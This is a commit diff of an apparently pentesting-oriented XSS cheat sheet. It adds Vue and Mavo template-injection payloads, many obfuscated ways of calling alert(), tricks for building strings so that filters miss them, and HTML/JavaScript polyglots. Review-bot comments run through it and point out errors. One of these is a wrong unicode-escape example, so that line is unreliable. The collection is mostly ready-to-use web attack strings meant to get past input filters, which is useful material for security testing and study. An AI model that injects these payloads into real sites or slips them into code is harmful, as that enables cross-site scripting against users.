GitBook: [master] 2 pages modified
This commit is contained in:
parent 7517161d89
commit b524d4bca9
@ -35,12 +35,30 @@ And the **source code** of the vulnerable example here: [https://github.com/azu/
"><div v-html="''.constructor.constructor('d=document;d.location.hash.match(\'x1\') ? `` : d.location=`//localhost/mH`')()"> aaa</div>
```

### **V3**

```text
{{_openBlock.constructor('alert(1)')()}}
```

Credit: [Gareth Heyes, Lewis Ardern & PwnFunction](https://portswigger.net/research/evading-defences-using-vuejs-script-gadgets)

### **V2**

```text
{{constructor.constructor('alert(1)')()}}
```

Credit: [Mario Heiderich](https://twitter.com/cure53berlin)

### Mavo

Payload:

```text
[self.alert(1)]
javascript:alert(1)%252f%252f..%252fcss-images
[Omglol mod 1 mod self.alert (1) andlol]
```


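Review bot: the Mavo block lists three payloads with no source credit and no indication of the injection context each one targets, whereas the V2 and V3 entries above each carry a credit line; the second payload, `javascript:alert(1)%252f%252f..%252fcss-images`, is double URL-encoded (`%252f` decodes to `%2f`, then to `/`), so it only fires where the value is decoded twice before reaching a URL sink, and that should be stated next to it. Also, the new V3 subsection is placed before V2, reversing the version order; swapping the two would read more naturally.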
@ -421,8 +421,60 @@ Set.constructor`al\x65rt\x2814\x29```;
$='e'; x='ev'+'al'; x=this[x]; y='al'+$+'rt(1)'; y=x(y); x(y)
x='ev'+'al'; x=this[x]; y='ale'+'rt(1)'; x(x(y))
this[[]+('eva')+(/x/,new Array)+'l'](/xxx.xxx.xxx.xxx.xx/+alert(1),new Array)
globalThis[`al`+/ert/.source]`1`
this[`al`+/ert/.source]`1`
[alert][0].call(this,1)
window['a'+'l'+'e'+'r'+'t']()
window['a'+'l'+'e'+'r'+'t'].call(this,1)
top['a'+'l'+'e'+'r'+'t'].apply(this,[1])
(1,2,3,4,5,6,7,8,alert)(1)
x=alert,x(1)
[1].find(alert)
top["al"+"ert"](1)
top[/al/.source+/ert/.source](1)
al\u0065rt(1)
al\u0065rt`1`
top['al\145rt'](1)
top['al\x65rt'](1)
top[8680439..toString(30)](1)
```

### General tricks

**To constructing strings**

Regex literals:
`/part1/.source+/part2/.source` => `'part1part2'`
Numbers to strings:
`8680439..toString(30)` => `'alert'` \( Number is generated using parseInt\(“alert”,30\), other bases also work \)

**use character escape sequences inside of strings**

simple tool for this is available [here](https://mothereff.in/js-escapes):
`"\x41" -> "A"`: hex encoding
`"\u0065" -> "A"`: unicode encoding \(value is decimal\)
`"\101" -> "A"`: octal encoding

**VaRy ThE capItaliZatiOn**

Sometimes a regex or other custom-made filters do case sensitive matching. You can then just use a toLowerCase\(\), like:
`globalThis["aLeRt".toLowerCase()]`

**Calling functions**

``alert`1``` : Template literal syntax
`alert.apply(this,[1])`: Using Function.prototype.apply
`alert.call(this,1)`: Using Function.prototype.call
`alert(1)`: Obviously, but included for completeness.
`[1].find(alert)`: Using predicates
`[1].filter(alert)`: Using predicates

**Reuse and recycle**

Remember to look into what is already loaded! jQuery is an easy example, but any sufficiently complex framework will likely have something usable. [Wappalyzer](https://chrome.google.com/webstore/detail/wappalyzer/gppongmhjkpfnbhagpmjfkannfbllamg?hl=en) or equivalent can help here.
`window.jQuery.globalEval("alert(1)")`
`$.globalEval("alert(1)")`

## **DOM vulnerabilities**

There is **JS code** that is using **unsafely data controlled by an attacker** like `location.href` . An attacker, could abuse this to execute arbitrary JS code.

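Review bot: the unicode escape example is wrong on two counts: `"\u0065"` evaluates to `"e"`, not `"A"` (`"\u0041"` is `"A"`, which would match the `\x41` and `\101` lines beside it), and the four digits after `\u` are hexadecimal, not decimal, so the parenthetical `(value is decimal)` should be dropped or corrected to `(value is hex)`. Two smaller points in the same hunk: the heading `**To constructing strings**` should read `**Constructing strings**`, and the case-variation example `globalThis["aLeRt".toLowerCase()]` only resolves the function without invoking it, so appending `(1)` would keep it consistent with the surrounding one-liners. The `8680439..toString(30)` derivation checks out: `parseInt("alert",30)` is 8680439, and the octal `\145` used in `top['al\145rt'](1)` is indeed `e`.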
@ -667,6 +719,7 @@ There is **C2** dedicated to the **exploitation of Service Workers** called [**S
### Polyglots

```javascript
javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*<svg/*/onload=alert()//>
-->'"/></sCript><deTailS open x=">" ontoggle=(co\u006efirm)``>
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0D%0A//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e
">><marquee><img src=x onerror=confirm(1)></marquee>" ></plaintext\></|\><plaintext/onmouseover=prompt(1) ><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->" ></script><script>alert(1)</script>"><img/id="confirm( 1)"/alt="/"src="/"onerror=eval(id&%23x29;>'"><img src="http: //i.imgur.com/P8mL8.jpg">

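Review bot: the first polyglot added here (the `javascript:"/*'/*` line ending in `onmouseover=/*<svg/*/onload=alert()//>`) is byte-for-byte identical to a line that already exists further down in the same block (it shows up as unchanged context in the next hunk), so this edit introduces a duplicate; drop one copy. The fence is also tagged `javascript` although the contents are HTML/URL polyglots rather than runnable JavaScript, which will mis-highlight; the other payload blocks in this commit are fenced as text, and this one should match.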
@ -685,7 +738,7 @@ javascript://--></title></style></textarea></script><svg "//' onclick=alert()//
/</title/'/</style/</script/--><p" onclick=alert()//>*/alert()/*
-->'"/></sCript><svG x=">" onload=(co\u006efirm)``>
<svg%0Ao%00nload=%09((pro\u006dpt))()//
javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*<svg/*/onload=alert()//>

javascript:"/*'/*`/*\" /*</title></style></textarea></noscript></noembed></template></script/--><svg/onload=/*<html/*/onmouseover=alert()//>
javascript:"/*\"/*`/*' /*</template></textarea></noembed></noscript></title></style></script>--><svg onload=/*<html/*/onmouseover=alert()//>
javascript:`//"//\"//</title></textarea></style></noscript></noembed></script></template><svg/onload='/*--><html */ onmouseover=alert()//'>`

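Review bot: the block gives no indication of which sink each payload targets, and the three kinds present need different pre-processing: `<svg%0Ao%00nload=%09((pro\u006dpt))()//` only forms an `onload` attribute if the value is percent-decoded before it reaches the HTML parser (otherwise `%0A`, `%00` and `%09` stay literal), while `/</title/'/</style/...` is raw HTML and the remaining lines are `javascript:`-scheme URLs; a one-word context tag per line (URL-decoded HTML, raw HTML, `javascript:` URL) would make the list usable without trial and error. Separately, the hunk header says one of these seven lines changed, but the rendered view has lost the `+`/`-` markers, so the actual edit cannot be checked from this page.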